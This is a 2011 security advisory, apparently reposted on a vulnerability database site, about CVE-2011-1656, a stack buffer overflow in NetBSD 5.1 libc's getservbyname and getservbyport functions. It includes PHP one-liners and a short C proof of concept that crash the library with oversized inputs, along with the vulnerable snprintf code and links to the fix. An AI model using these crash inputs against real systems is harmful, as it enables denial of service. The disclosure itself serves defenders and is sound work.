NetBSD 5.1 libc/net multiple functions stack buffer overflow

2011-06-30 / 2011-07-01
Risk: High
Local: Yes
Remote: Yes
CWE: CWE-119

[ NetBSD 5.1 libc/net multiple functions stack buffer overflow ] Author: Maksymilian Arciemowicz http://netbsd.org/donations/ Date: - Dis.: 01.04.2011 - Pub.: 01.07.2011 CVE: CVE-2011-1656 CWE: CWE-121 Affected software: - NetBSD 5.1 (fixed) Affected functions: - getservbyname(3) - getservbyname_r(3) - getservbyport(3) - getservbyport_r(3) - getaddrinfo(3) - getnameinfo(3) --- 0.Description --- The getservbyname(), and getservbyport() functions each return a pointer to an object with the following structure containing the broken-out fields of a line in the network services data base, struct servent * getservbyname(const char *name, const char *proto); struct servent * getservbyport(int port, const char *proto); The getservbyname() and getservbyport() functions sequentially search from the beginning of the file until a matching protocol name or port number is found, or until EOF is encountered. If a protocol name is also supplied (non-NULL), searches must also match the protocol. --- 1. NetBSD 5.1 libc/net multiple functions stack buffer overflow --- The main problem exists in files like getservbyname_r.c and getservbyport_r.c. Functions getservbyname*(3), getservbyport*(3) and getaddrinfo(3) of NetBSD libc implementation, provides to possible buffer overflow. To demonstrate this issue, we may use PHP as an attack vector. 127# php -r 'getservbyname("A",str_repeat("A",7108));' 127# php -r 'getservbyname("A",str_repeat("A",7109));' Memory fault (core dumped) -php-5.3.6/ext/standard/basic_functions.c--- PHP_FUNCTION(getservbyname) { char *name, *proto; int name_len, proto_len; struct servent *serv; if (zend_parse_parameters(ZEND_NUM_ARGS() TSRMLS_CC, "ss", &name, &name_len, &proto, &proto_len) == FAILURE) { return; } ... serv = getservbyname(name, proto); <==== CALL TO LIBC -php-5.3.6/ext/standard/basic_functions.c--- BT: #0 0xbb8b2d65 in __log2 () from /usr/lib/libc.so.12 #1 0xbb8afa2e in __call_hash () from /usr/lib/libc.so.12 #2 0xbb8b0ebd in __hash_open () from /usr/lib/libc.so.12 #3 0xbb8884c2 in getservbyname_r () from /usr/lib/libc.so.12 #4 0xbb822f6f in getservbyname () from /usr/lib/libc.so.12 #5 0x08334458 in php_get_highlight_struct () Let's see what is wrong with getservbyname(). -getservbyname.c--- struct servent * getservbyname(const char *name, const char *proto) { struct servent *s; mutex_lock(&_servent_mutex); s = getservbyname_r(name, proto, &_servent_data.serv, &_servent_data); <=== REFERENCE mutex_unlock(&_servent_mutex); return (s); } -getservbyname.c--- as we can see, getservbyname(3) redirect to getservbyname_r(3) function. -getservbyname_r.c--- if (sd->flags & _SV_DB) { char buf[BUFSIZ]; DBT key, data; DB *db = sd->db; key.data = buf; if (proto == NULL) key.size = snprintf(buf, sizeof(buf), "\376%s", name); <===== INVALID key.size HERE else key.size = snprintf(buf, sizeof(buf), "\376%s/%s", <===== INVALID key.size HERE name, proto); key.size++; if ((*db->get)(db, &key, &data, 0) != 0) return NULL; if ((*db->get)(db, &data, &key, 0) != 0) return NULL; -getservbyname_r.c--- key.size may be bigger as BUFSIZ. snprintf(3) return number of characters that would have been written had size been sufficiently large (not counting the terminating null). In this case, snprintf(3) return bigger value as sizeof(buf). In older libc implementations, snprintf(3) should return -1, if the string is truncated. The same problem is with getservbyport_r(3). -getservbyname_r.c--- if (sd->flags & _SV_DB) { char buf[BUFSIZ]; DBT key, data; DB *db = sd->db; key.data = buf; port = htons(port); if (proto == NULL) key.size = snprintf(buf, sizeof(buf), "\377%d", port); <===== INVALID key.size HERE else key.size = snprintf(buf, sizeof(buf), "\377%d/%s", port, <===== INVALID key.size HERE proto); key.size++; if ((*db->get)(db, &key, &data, 0) != 0) return NULL; if ((*db->get)(db, &data, &key, 0) != 0) return NULL; -getservbyname_r.c--- And the last PoC: -PoC--- /* 127# gcc -o grr grr.c && ./grr 6050 127# gcc -o grr grr.c && ./grr 6051 Memory fault (core dumped) 127# */ #include <stdlib.h> #include <string.h> #include <netdb.h> int main(int argc, char *argv[]){ char *cycek; cycek=malloc(atoi(argv[1])); if(!cycek) return 1; memset(cycek,'A',atoi(argv[1])); getservbyname(cycek,"tcp"); return 0; } -PoC--- NetBSD has fixed this issue. Use cvs netbsd-5-1 and netbsd-5-0 to up-to date your system. There are no others vulnerable libc implementations. Only FreeBSD 8.2 use wrong snprintf(3) in getservent.c http://www.freebsd.org/cgi/cvsweb.cgi/~checkout~/src/lib/libc/net/getservent.c?rev=1.23.10.3.4.1;content-type=text%2Fplain GNU libc may give problem with alloca(). --- 2. Fix --- http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/net/getservbyname_r.c http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/net/getservbyport_r.c NetBSD CVS tags: - netbsd-5-1 - netbsd-5-0 - netbsd-5 --- 3. Greets --- Christos Zoulas, sp3x, Infospec --- 4. Contact --- Author: Maksymilian Arciemowicz

References:

http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/net/getservbyname_r.c
http://cvsweb.netbsd.org/bsdweb.cgi/src/lib/libc/net/getservbyport_r.c


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top